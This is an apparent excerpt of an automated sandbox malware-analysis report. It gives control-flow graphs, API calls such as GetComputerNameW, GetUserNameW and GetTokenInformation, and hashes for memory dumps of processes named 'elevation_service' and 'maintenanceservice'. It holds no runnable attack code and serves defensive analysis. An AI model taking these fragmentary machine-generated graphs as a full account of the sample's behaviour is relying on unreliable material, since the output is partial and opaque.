                                        control_flow_graph 423 995b87-995b99 CreateThread 426 995cff-995d01 423->426 427 995bb4-995ce4 CreateThread 426->427 428 995d07 426->428 432 995cea 427->432 433 995c01-995d41 427->433 428->427 430 995d0d 428->430 432->433 434 995cf0-995cf6 432->434 440 995d4b-995d52 433->440 441 995d43 433->441 434->426 436 995c20-995c68 434->436 442 995d54 440->442 443 995d45-995d47 440->443 441->442 444 995d49 443->444 445 995d5f 443->445 444->440 444->445 446 995d65 445->446 446->446
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID: CreateThread
                                        • String ID:
                                        • API String ID: 2422867632-0
                                        • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction ID: e0bec9f308ab4e61039d39e5155d7732c80c334bdbdf0158e00e3f997bafe22b
                                        • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                        • Instruction Fuzzy Hash: B9E0863060DF444FDF5B9B28981031A3AE5EB88310F1A05DEC44AD71D1DB6949058792
                                        Function 0099599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 447 99599b-99599e 448 9959f7 447->448 449 995a02 448->449 451 99597d 449->451 452 9959d4 449->452 451->452 453 99597f-995981 451->453 454 9959d8-9959de 452->454 455 99593b-995a15 call 9b11a0 452->455 456 995983-995a38 453->456 461 9959e0 454->461 462 995994-99599c 454->462 456->462 463 995a3e 456->463 461->462 467 9959e2-9959ec 461->467 462->449 465 99599e 462->465 466 995a2c-995a34 463->466 465->448 470 9959d9-9959de call 9c2190 466->470 468 9959ee-9959ef 467->468 469 995a62-995a6e 467->469 468->456 471 9959f1 call 9c9970 468->471 473 995a70 469->473 474 995a75-995ab3 call 9b1280 469->474 470->461 470->462 483 9959b8 call 9b0df0 471->483 473->474 478 995a72 473->478 487 995abb-995ac9 474->487 488 995ab5 474->488 478->474 486 9959bd-9959c2 call 995d90 483->486 492 9959c7-9959ce 486->492 490 995af2-995af5 487->490 488->487 491 995ab7-995ab9 488->491 503 995adb-995adc 490->503 504 995ad5 490->504 491->487 493 995a1a-995a26 492->493 494 9959d0 492->494 493->466 497 9959a1-9959b5 call 995e10 493->497 494->493 496 9959d2 494->496 496->470 497->483 502 995a08-995a0b 497->502 502->462 507 995a0d 502->507 505 995ae2 503->505 506 995a45-995a46 503->506 504->503 508 995ad7-995ad9 504->508 505->506 509 995ae8 505->509 511 995991 507->511 512 995932 507->512 508->503 509->490 511->512 513 995993 511->513 513->462
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID: wcscpy
                                        • String ID:
                                        • API String ID: 1284135714-0
                                        • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction ID: c1e66d732b224f527dca0f85ec48c694ce6112ecfa8866b0668fb00bc32206c6
                                        • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                        • Instruction Fuzzy Hash: 3C01D66090EE80CFFF17A71C405537B6555B794330FAB095AA08ACB192C8384D009746
                                        Function 00998090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 514 998090-998096 515 998184 514->515 516 99818c-998192 515->516 517 998186 CloseHandle 515->517 518 998115-998118 516->518 519 998194 516->519 517->516 520 998119-99811a 518->520 521 9980a7 518->521 519->518 522 99819a 519->522 520->521 523 99811c 520->523 524 99813c 522->524 525 99820f 523->525 524->515 526 99808e-998096 525->526 527 998215-99821e 525->527 526->515 526->521 527->526 529 998224 527->529 530 9981d7-9981e6 call 9c715c 529->530 531 998226 529->531 541 998089 530->541 542 9980ca-99810f GetTokenInformation 530->542 531->530 532 998228-9982ee call 995d90 531->532 543 99830c-99831e 532->543 544 9982f0 532->544 541->542 546 99808b 541->546 547 99812d 542->547 548 998111 542->548 550 9982a1-9982ba call 995d90 call 99ec00 543->550 551 998320 543->551 544->543 549 9982f2 544->549 552 99808c 546->552 556 9980a8 547->556 557 998133 547->557 548->547 554 998113 548->554 555 9982f7-9982fc call 995d90 549->555 550->551 551->555 558 998322 551->558 552->526 554->518 575 998253-998265 call 9b1280 555->575 576 998302 555->576 560 9980aa-9980ad 556->560 557->524 562 9981ed-9981f0 557->562 558->555 563 998324-998326 558->563 565 998163-998170 call 9c7164 560->565 566 9980b3-998203 560->566 567 9980da-9980f1 562->567 568 9981f6 562->568 570 998328 563->570 565->517 586 998172 565->586 566->565 584 998209 566->584 567->560 568->567 574 9981fc 568->574 581 9982df-99832b 570->581 582 998335 570->582 580 9981fe-998201 GetTokenInformation 574->580 575->570 591 99826b 575->591 576->575 583 998308-99830a 576->583 580->525 599 9981b7 580->599 581->582 593 99832d-998331 581->593 590 99826e-998285 582->590 583->543 586->516 595 99829b-99829d 590->595 596 998287 590->596 591->590 598 998239 591->598 593->582 595->550 597 99824c 596->597 597->595 602 99824e-998252 597->602 598->570 600 99823f-998243 598->600 599->525 601 9981b9-9981ca 599->601 600->555 600->597 605 9981d0 601->605 606 9980f3 601->606 602->590 605->580 611 9980c3 605->611 606->552 608 9980f5 606->608 608->552 612 998077 608->612 611->580 613 9980c9 611->613 612->530 613->542
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction ID: 0ebfad7ed046831af2fc8c07419aed7eb621a9afe250e7e6715db5aeb8359688
                                        • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                        • Instruction Fuzzy Hash: 32C04C6152D946966E79064C1C1B0B726589603755B1C084E9C0685220DE598E8351AB
                                        Function 0099817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 614 99817f 615 998184 614->615 616 99818c-998192 615->616 617 998186 CloseHandle 615->617 618 998115-998118 616->618 619 998194 616->619 617->616 620 998119-99811a 618->620 621 9980a7 618->621 619->618 622 99819a 619->622 620->621 623 99811c 620->623 624 99813c 622->624 625 99820f 623->625 624->615 626 99808e-998096 625->626 627 998215-99821e 625->627 626->615 626->621 627->626 629 998224 627->629 630 9981d7-9981e6 call 9c715c 629->630 631 998226 629->631 641 998089 630->641 642 9980ca-99810f GetTokenInformation 630->642 631->630 632 998228-9982ee call 995d90 631->632 643 99830c-99831e 632->643 644 9982f0 632->644 641->642 646 99808b 641->646 647 99812d 642->647 648 998111 642->648 650 9982a1-9982ba call 995d90 call 99ec00 643->650 651 998320 643->651 644->643 649 9982f2 644->649 652 99808c 646->652 656 9980a8 647->656 657 998133 647->657 648->647 654 998113 648->654 655 9982f7-9982fc call 995d90 649->655 650->651 651->655 658 998322 651->658 652->626 654->618 675 998253-998265 call 9b1280 655->675 676 998302 655->676 660 9980aa-9980ad 656->660 657->624 662 9981ed-9981f0 657->662 658->655 663 998324-998326 658->663 665 998163-998170 call 9c7164 660->665 666 9980b3-998203 660->666 667 9980da-9980f1 662->667 668 9981f6 662->668 670 998328 663->670 665->617 686 998172 665->686 666->665 684 998209 666->684 667->660 668->667 674 9981fc 668->674 681 9982df-99832b 670->681 682 998335 670->682 680 9981fe-998201 GetTokenInformation 674->680 675->670 691 99826b 675->691 676->675 683 998308-99830a 676->683 680->625 699 9981b7 680->699 681->682 693 99832d-998331 681->693 690 99826e-998285 682->690 683->643 686->616 695 99829b-99829d 690->695 696 998287 690->696 691->690 698 998239 691->698 693->682 695->650 697 99824c 696->697 697->695 702 99824e-998252 697->702 698->670 700 99823f-998243 698->700 699->625 701 9981b9-9981ca 699->701 700->655 700->697 705 9981d0 701->705 706 9980f3 701->706 702->690 705->680 711 9980c3 705->711 706->652 708 9980f5 706->708 708->652 712 998077 708->712 711->680 713 9980c9 711->713 712->630 713->642
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2956747746.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_990000_elevation_service.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction ID: 6a90d42bd3a293ff1465b01179d1ac86244813da0b9dac14497396e5d752d484
                                        • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                        • Instruction Fuzzy Hash: 5DC092A055C509876D38268C2C0A0B3355C8613760F0C481FEC068A360DE598D8351B2

                                        Execution Graph

                                        Execution Coverage:3.7%
                                        Dynamic/Decrypted Code Coverage:97.8%
                                        Signature Coverage:0%
                                        Total number of Nodes:93
                                        Total number of Limit Nodes:5
                                        execution_graph 5567 cd55ef 5570 cd55ac 5567->5570 5569 cd55e9 5570->5569 5571 cf3870 5570->5571 5572 cf3876 5571->5572 5574 cf3893 5572->5574 5575 cf3720 5572->5575 5574->5570 5578 ce0c42 5575->5578 5576 cf37dd 5576->5574 5577 cde050 VirtualAlloc 5577->5578 5578->5575 5578->5576 5578->5577 5611 cd5b09 5612 cd5b16 5611->5612 5613 cd5c01 5612->5613 5614 cd5d0d 5612->5614 5615 cd5cdf CreateThread 5612->5615 5616 cd5c03 CloseHandle 5613->5616 5618 cd5c20 5613->5618 5615->5613 5619 cd54a0 5615->5619 5617 cd5d37 5616->5617 5579 cd55e4 5580 cd55ac 5579->5580 5580->5579 5581 cf3870 VirtualAlloc 5580->5581 5582 cd55e9 5580->5582 5581->5580 5494 cd5b87 CreateThread 5495 cd5b1c 5494->5495 5504 cd5810 5494->5504 5496 cd5c01 5495->5496 5497 cd5d0d 5495->5497 5498 cd5cdf CreateThread 5495->5498 5499 cd5c03 CloseHandle 5496->5499 5500 cd5c20 5496->5500 5498->5496 5502 cd54a0 5498->5502 5501 cd5d37 5499->5501 5503 cd54b5 5502->5503 5505 cd5822 5504->5505 5512 cd5b00 5513 cd5bba 5512->5513 5520 ce52c0 5513->5520 5515 cd5bc7 5519 cd5bde 5515->5519 5525 cf0080 5515->5525 5521 ce52c6 5520->5521 5524 ce52ce 5520->5524 5521->5524 5539 cde050 5521->5539 5524->5515 5531 cf0089 5525->5531 5526 cf03e0 GetComputerNameW 5526->5531 5527 cf0181 VirtualFree 5527->5531 5528 cde050 VirtualAlloc 5528->5531 5529 cf03bf GetUserNameW 5529->5531 5530 cf04d6 GetComputerNameW 5530->5531 5531->5526 5531->5527 5531->5528 5531->5529 5531->5530 5532 cd5c7b 5531->5532 5533 cd8070 5532->5533 5537 cd8075 5533->5537 5534 cd8186 CloseHandle 5534->5537 5535 cd81ad GetTokenInformation 5535->5537 5536 cd80ca GetTokenInformation 5536->5537 5537->5534 5537->5535 5537->5536 5538 cd80a7 5537->5538 5538->5519 5540 cde0c3 5539->5540 5541 cde0d8 VirtualAlloc 5540->5541 5541->5540 5560 cd5860 5561 ce52c0 VirtualAlloc 5560->5561 5562 cd5869 5561->5562 5563 cf0080 5 API calls 5562->5563 5564 cd587d 5563->5564 5565 cd8070 3 API calls 5564->5565 5566 cd5870 5565->5566 5542 cd5be2 5543 cd5bfc CloseHandle 5542->5543 5544 cd5be7 5542->5544 5543->5544 5546 cd5b42 5547 cd5b07 5546->5547 5547->5546 5548 cd5cdf CreateThread 5547->5548 5549 cd5b68 5547->5549 5550 cd5c01 5548->5550 5553 cd54a0 5548->5553 5551 cd5c20 5550->5551 5552 cd5c03 CloseHandle 5550->5552 5552->5549 5506 cd81b1 5508 cd8075 5506->5508 5507 cd8186 CloseHandle 5507->5508 5508->5507 5509 cd81ad GetTokenInformation 5508->5509 5510 cd80ca GetTokenInformation 5508->5510 5511 cd80a7 5508->5511 5509->5508 5510->5508 5554 cd8090 5556 cd8075 5554->5556 5555 cd8186 CloseHandle 5555->5556 5556->5555 5557 cd80a7 5556->5557 5558 cd80ca GetTokenInformation 5556->5558 5559 cd81ad GetTokenInformation 5556->5559 5558->5556 5559->5556 5583 cd57f0 5584 cd55ac 5583->5584 5585 cd55e9 5584->5585 5586 cf3870 VirtualAlloc 5584->5586 5586->5584

                                        Executed Functions

                                        Function 00CD52A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 314 cd52a0-cd52a5 315 cd532e-cd533f 314->315 316 cd52ab-cd52f5 314->316 320 cd536b-cd5390 315->320 316->315 319 cd52f7 316->319 321 cd53fe 319->321 327 cd53c3 320->327 328 cd5392-cd539a 320->328 323 cd5404-cd540e 321->323 324 d10d4c-d10d4e 321->324 326 cd5424 323->326 329 cd539b 326->329 330 cd542a 326->330 328->329 331 cd539d-cd53a1 329->331 332 cd5413-cd5419 329->332 330->329 333 cd5430-cd5443 330->333 334 cd53a7 331->334 335 cd52b0-cd52b5 331->335 334->335 336 cd53ad 334->336 337 cd53af-cd53f1 336->337 338 cd53f3-cd53f9 336->338 337->332 337->338 338->321 341 cd5322-cd5328 338->341 342 cd532a 341->342 343 cd5355 341->343 342->343 344 cd532c 342->344 346 cd52e8-cd5363 343->346 347 cd52d1-cd52e7 343->347 344->315 350 cd5365 346->350 351 cd53d1-cd53d5 346->351 347->346 350->351 352 cd5367-cd5369 350->352 351->331 353 cd53d7 351->353 352->320 355 cd534b 353->355 356 cd5400-cd540e 353->356 355->356 357 cd5351-cd5353 355->357 356->326 357->343
                                        APIs
                                        • GetSystemDefaultLangID.KERNELBASE ref: 00CD53C4
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID: DefaultLangSystem
                                        • String ID:
                                        • API String ID: 706401283-0
                                        • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction ID: a1710b2ed5386c05852ea9c7e8ae72828403fdd03fcbc91fccc6e0878259c622
                                        • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                        • Instruction Fuzzy Hash: 984128A180DE958FD72A422948643717BD09B223E2F9D04D7D3E3CB3F6D2984D859727
                                        Function 00CF0080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 cf0080-cf0286 2 cf028c 0->2 3 cf0099-cf0575 0->3 5 cf0445 2->5 7 cf057b 3->7 8 cf0155 3->8 5->3 6 cf044b-cf0457 5->6 9 cf0458-cf0472 GetComputerNameW 6->9 7->8 10 cf0581-cf0587 7->10 11 cf02ef-cf0495 call cde050 * 2 8->11 15 cf03ee-cf03f4 9->15 16 cf024c-cf0253 9->16 13 cf058b 10->13 11->9 50 cf043e 11->50 18 cf058c-cf0591 13->18 19 cf0181 VirtualFree 13->19 37 cf00da-cf023f 15->37 38 cf03fa 15->38 23 cf01e6 16->23 24 cf0255 16->24 21 cf04ab-cf04af 18->21 22 cf0597 18->22 20 cf01a8-cf02ac call d07164 19->20 28 cf02b1-cf02be 20->28 48 cf04c7 21->48 22->21 30 cf059d 22->30 27 cf01ec-cf0313 call d0715c 23->27 23->28 31 cf02d3 24->31 53 cf0318-cf031e 27->53 33 cf03bf-cf03d9 GetUserNameW 28->33 34 cf02c4 28->34 30->21 31->23 36 cf02d9 31->36 43 cf0331 33->43 34->33 44 cf02ca 34->44 36->11 37->16 51 cf0241-cf024a 37->51 38->37 45 cf0400 38->45 54 cf0337 43->54 55 cf0171 43->55 44->31 52 cfb1ee-cfb49f 45->52 59 cf04cc-cf04e6 call d09970 GetComputerNameW 48->59 50->5 51->16 51->28 57 cf0568-cf056b 53->57 58 cf0324 53->58 54->55 56 cf033d 54->56 60 cf013f-cf0146 55->60 61 cf0173 55->61 63 cf05d0-cf05d9 56->63 57->59 58->57 65 cf032a 58->65 70 cf04ec-cf0514 59->70 71 cf0131 59->71 60->13 62 cf0230 61->62 62->48 67 cf0236-cf05c2 62->67 63->52 65->43 67->48 74 cf05c8-cf05c9 67->74 70->57 72 cf0089-cf008c 71->72 73 cf0137 71->73 72->20 76 cf0092 72->76 73->72 77 cf013d 73->77 74->63 76->20 78 cf0098 76->78 77->19 77->60 78->3
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction ID: de7ae2bea8f0cd1f3d677937731973d3fdc963722b5b2005cf6e84b8bb98d6e8
                                        • Opcode Fuzzy Hash: f2c426ce008c29bb37f5d3562478f99eada15862b80321597c233d777d3b9804
                                        • Instruction Fuzzy Hash: 94D13531418B0D8BC7A8EF58C8457FAB7D1FBA0710F28461FDA56C7166DA749A44C6C3
                                        Function 00CD8070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 79 cd8070-cd817e 81 cd813d-cd81a5 79->81 82 cd8180 79->82 95 cd81bd-cd81ca 81->95 96 cd81a7 81->96 83 cd815f 82->83 84 cd8184 82->84 83->81 88 cd8161 83->88 85 cd818c-cd8192 84->85 86 cd8186 CloseHandle 84->86 90 cd8115-cd8118 85->90 91 cd8194 85->91 86->85 92 cd8163-cd8170 call d07164 88->92 93 cd8119-cd811a 90->93 94 cd80a7 90->94 91->90 97 cd819a 91->97 92->86 104 cd8172 92->104 93->94 99 cd811c 93->99 107 cd81d0 95->107 108 cd80f3 95->108 100 cd813c 97->100 102 cd820f 99->102 100->84 105 cd808e-cd8096 102->105 106 cd8215-cd821e 102->106 104->85 105->84 105->94 106->105 118 cd8224 106->118 115 cd81fe-cd8201 GetTokenInformation 107->115 116 cd80c3 107->116 109 cd808c 108->109 110 cd80f5 108->110 109->105 110->109 117 cd8077 110->117 115->102 128 cd81b7 115->128 116->115 120 cd80c9 116->120 121 cd81d7-cd81de call d0715c 117->121 118->121 122 cd8226 118->122 124 cd80ca-cd80d8 GetTokenInformation 120->124 130 cd81e3-cd81e6 121->130 122->121 125 cd8228-cd82ee call cd5d90 122->125 127 cd810f 124->127 146 cd830c-cd831e 125->146 147 cd82f0 125->147 133 cd812d 127->133 134 cd8111 127->134 128->102 132 cd81b9-cd81bb 128->132 130->124 142 cd8089 130->142 132->95 137 cd80a8 133->137 138 cd8133 133->138 134->133 140 cd8113 134->140 144 cd80aa-cd80ad 137->144 138->100 141 cd81ed-cd81f0 138->141 140->90 148 cd80da-cd80f1 141->148 149 cd81f6 141->149 142->124 145 cd808b 142->145 144->92 150 cd80b3-cd8203 144->150 145->109 153 cd82a1-cd82ba call cd5d90 call cdec00 146->153 154 cd8320 146->154 147->146 155 cd82f2 147->155 148->144 149->148 151 cd81fc 149->151 150->92 156 cd8209 150->156 151->115 153->154 159 cd82f7-cd82fc call cd5d90 154->159 160 cd8322 154->160 155->159 168 cd8253-cd8265 call cf1280 159->168 169 cd8302 159->169 160->159 163 cd8324-cd8326 160->163 167 cd8328 163->167 174 cd82df-cd832b 167->174 175 cd8335 167->175 168->167 181 cd826b 168->181 169->168 173 cd8308-cd830a 169->173 173->146 174->175 182 cd832d-cd8331 174->182 177 cd826e-cd8285 175->177 179 cd829b-cd829d 177->179 180 cd8287 177->180 179->153 183 cd824c 180->183 181->177 184 cd8239 181->184 182->175 183->179 186 cd824e-cd8252 183->186 184->167 185 cd823f-cd8243 184->185 185->159 185->183 186->177
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction ID: 6ca86fe024f6c18844252e790da2b24cabfc4f0b2cc59f9f263ef4ab3ca4886f
                                        • Opcode Fuzzy Hash: bfa7abbba837048b5084d14a6e3f10e10a947a6e49ec2fa660cf16e8a7df21b7
                                        • Instruction Fuzzy Hash: 8C61667050CA459FC7699B29885433EBBA0FB55350F58065BD72BC33A0DF24AE0E9352
                                        Function 00CD5B09 Relevance: 3.1, APIs: 2, Instructions: 60COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 187 cd5b09-cd5d01 192 cd5bb4 187->192 193 cd5d07 187->193 194 cd5cda-cd5ce4 CreateThread 192->194 195 cd5c01-cd5d41 CloseHandle 192->195 193->192 196 cd5d0d 193->196 194->195 199 cd5cea 194->199 202 cd5d4b-cd5d52 195->202 203 cd5d43 195->203 199->195 201 cd5cf0-cd5cf6 199->201 205 cd5d45-cd5d47 202->205 206 cd5d54 202->206 203->206 207 cd5d5f 205->207 208 cd5d49 205->208 210 cd5d65 207->210 208->202 208->207 210->210
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction ID: 4e88c4713c2cd36903f32c0fee0c93f3fb019d73d4d61aa20cc8d46cadabe776
                                        • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                        • Instruction Fuzzy Hash: B301683011DF468FDB6547258D183397BD1EB99334F2401ABC693CA3D5DF604B00A722
                                        Function 00CD5910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 211 cd5910-cd5912 212 cd5915-cd5928 call d09970 211->212 213 cd5950-cd5968 211->213 220 cd59b8 call cf0df0 212->220 213->212 215 cd596a 213->215 217 cd592f 215->217 218 cd5970-cd597b 215->218 217->212 219 cd5931-ce072c 217->219 221 cd597d 218->221 222 cd59d4 218->222 231 ce0806-ce0809 219->231 232 ce0732-ce0738 219->232 229 cd59bd-cd59c2 call cd5d90 220->229 221->222 227 cd597f-cd5981 221->227 224 cd59d8 222->224 225 cd593b-cd5a15 call cf11a0 222->225 233 cd59d9-cd59de call d02190 224->233 230 cd5983-cd5a38 227->230 245 cd59c7-cd59ce 229->245 243 cd5a3e 230->243 244 cd5994-cd599c 230->244 246 ce079d-ce07a6 231->246 238 ce073e 232->238 239 ce0800 232->239 233->244 263 cd59e0 233->263 238->239 247 ce0744-ce0774 238->247 239->231 242 ce06b3-ce06b7 239->242 242->246 251 ce06bd 242->251 255 cd5a2c-cd5a34 243->255 249 cd599e-cd59f7 244->249 250 cd5a02 244->250 256 cd5a1a-cd5a26 245->256 257 cd59d0 245->257 253 ce07a8 246->253 254 ce0791-ce0793 246->254 258 ce077a-ce081c 247->258 259 ce06d5-ce06d9 247->259 249->250 250->218 251->246 261 ce06c3-ce07fe 251->261 253->254 264 ce07aa 253->264 262 ce07ca-ce07cc 254->262 255->233 256->255 265 cd59a1-cd59b5 call cd5e10 256->265 257->256 266 cd59d2-cd59de 257->266 258->246 271 ce06df 259->271 272 ce06db 259->272 261->239 263->244 268 cd59e2-cd59ec 263->268 264->262 265->220 280 cd5a08-cd5a0b 265->280 266->244 266->263 274 cd59ee-cd59ef 268->274 275 cd5a62-cd5a6e 268->275 271->246 272->271 277 ce06dd 272->277 274->230 279 cd59f1 274->279 282 cd5a75-cd5ab3 call cf1280 275->282 283 cd5a70 275->283 277->271 281 cec0cc 277->281 279->212 280->244 286 cd5a0d 280->286 287 cec0ce-cec0d0 281->287 288 cec0e8-cec102 281->288 301 cd5abb-cd5ac9 282->301 302 cd5ab5 282->302 283->282 284 cd5a72 283->284 284->282 294 cd5991 286->294 295 cd5932 286->295 290 cec0d2-cec0df 287->290 289 cec104 288->289 288->290 289->290 297 cec0e7 289->297 290->297 294->295 299 cd5993 294->299 299->244 304 cd5af2-cd5af5 301->304 302->301 303 cd5ab7-cd5ab9 302->303 303->301 308 cd5adb-cd5adc 304->308 309 cd5ad5 304->309 311 cd5a45-cd5a46 308->311 312 cd5ae2 308->312 309->308 310 cd5ad7-cd5ad9 309->310 310->308 312->311 313 cd5ae8 312->313 313->304
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction ID: c4d399256493cddb3be92b02f6ab4d0bf39ef011bc765b2ce97f862d48bb6f57
                                        • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                        • Instruction Fuzzy Hash: 97F1242171CE4C8FC6A9A71D58513BAB3D2EB99310F68029BE25EC3396CD349D469783
                                        Function 00CD5B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 358 cd5b42-cd5b47 call cd5d90 360 cd5b4c-cd5b52 358->360 362 cd5b0d 360->362 363 cd5c42-cd5c62 call cf1280 360->363 362->363 364 cd5b13 362->364 381 cd5c14-cd5cc0 363->381 382 cd5c26 363->382 366 cd5c8f-cd5c96 364->366 368 cd5c29 366->368 369 cd5c98-cd5c9a 366->369 370 cd5c2f-cd5c36 368->370 371 cd5cc2-cd5cc9 call cd52a0 368->371 373 cd5c9c 369->373 370->371 374 cd5c3c 370->374 383 cd5c69 371->383 384 cd5ccb 371->384 379 cd5d0e-cd5d18 373->379 380 cd5bfa 373->380 374->358 386 cd5d1a 379->386 387 cd5d54 379->387 380->379 385 cd5c00 380->385 381->371 382->381 389 cd5c28 382->389 391 cd5c6f 383->391 392 cd5b68-cd5d75 383->392 384->373 390 cd5ccd 384->390 385->381 393 cd5d4b-cd5d52 386->393 389->368 390->373 394 cd5ccf-cd5ce4 CreateThread 390->394 391->392 396 cd5c75 391->396 393->387 397 cd5d45-cd5d47 393->397 401 cd5cea 394->401 402 cd5c01-cd5c05 CloseHandle 394->402 396->366 399 cd5d5f 397->399 400 cd5d49 397->400 405 cd5d65 399->405 400->393 400->399 401->402 403 cd5cf0-cd5cf6 401->403 407 cd5d37-cd5d41 402->407 405->405 407->393 409 cd5d43 407->409 409->387
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1771706818.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_cd0000_maintenanceservice.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction ID: c20e83633843fcb0a31c162fc4cef536a8cec69b3c9000f513e85b0f070ff017
                                        • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                        • Instruction Fuzzy Hash: 4121F43022CF448FCB699B1D844873576E2EBDD351F2801AB8367CF3E6CA248E449322
                                        Function 00CD5B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
